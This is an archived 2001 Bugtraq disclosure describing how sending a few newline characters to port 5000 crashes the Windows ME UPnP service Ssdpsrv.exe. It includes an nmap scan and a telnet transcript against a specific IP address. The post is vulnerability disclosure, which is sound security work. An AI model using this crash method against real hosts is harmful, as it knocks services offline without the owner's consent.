Ssdpsrv.exe in WindowsME

From: milo omega (mtwoar@hotmail.com)
Date: 10/18/01


From: "milo omega" <mtwoar@hotmail.com>
To: bugtraq@securityfocus.com
Subject: Ssdpsrv.exe in WindowsME
Date: Wed, 17 Oct 2001 19:46:29 -0500
Message-ID: <F15tMIO5pt4gVvpQN1R00009e33@hotmail.com>

By connecting to a computer running Ssdpsrv you are able to crash the
Ssdpsrv server.

Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes.
This service comes standard with the WindowsME installation.

The Ssdpsrv.exe server is started at boot.
Here is the registry entry:
  KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices
Here is the file that starts the server:
  c:\windows\system\ssdpsrv.exe

For information about UPnP go here:
  http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP

Upon running a scan on a computer running the server I get the following:
<snip>
  bash-2.05$ nmap -sT 165.121.234.217
  Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ )
  Interesting ports on user-2injqmp.dialup.mindspring.com (165.121.234.217):
  (The 1547 ports scanned but not shown below are in state: closed)
  Port State Service
  139/tcp open netbios-ssn
  5000/tcp open fics
  Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds
</snap>

Method to crash Ssdpsrv:
  Connect to the computer on port 5000.
  Send 3 to 5 newline characters.
  You then get an error and are disconnected.
<snip>
  bash-2.05$ telnet 165.121.234.217 5000
  Trying 165.121.234.217...
  Connected to 165.121.234.217.
  Escape character is '^]'.

  HTTP/1.1 400 Bad Request

  Connection closed by foreign host.
  bash-2.05$
</snap>

Here is the error caused by the crash:
  Ssdpsrv has caused an error in MSVCRT.DLL.
  Ssdpsrv will now close.
  If you continue to experience problems,
  try restarting your computer.

This causes the server crash and closes port 5000.
Either you must restart the server by manually running ssdpsrv.exe
or reboot.

shouts to pulltheplug #c.
:o

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp



Relevant Pages

  • Re: Hvy Plastic 2 --- Plastic Explosives
    ... Wednesday's update fell victim to a server crash, ... The nuke fest was not a satisfying ending after investing ... The player triggering this crash gets spared the mine damage for his ...
    (rec.games.empire)
  • Cancel IO problems on Server 2003
    ... I have an old monolithic driver that works OK on NT 4.0 and Win 2000 ... I have included a crash dump. ... An API library ... This all works OK on NT 4.0, Win2k and also 2003 Server. ...
    (microsoft.public.development.device.drivers)
  • RE: Exchange backup on SBS2003 crashes server
    ... After the crash, no server resources are available on ... The log created by the backup is completely empty. ... I understand the server usual crashed during ... these libraries. ...
    (microsoft.public.windows.server.sbs)
  • [Full-disclosure] Multiple vulnerabilities in Babo Violent 2 2.08.00
    ... C] crash through unexistent map ... D] crash through malformed UDP packet ... B and C versus server ... Both the servers and the clients open another port other than 3333 ...
    (Full-Disclosure)
  • Multiple vulnerabilities in Babo Violent 2 2.08.00
    ... C] crash through unexistent map ... D] crash through malformed UDP packet ... B and C versus server ... Both the servers and the clients open another port other than 3333 ...
    (Bugtraq)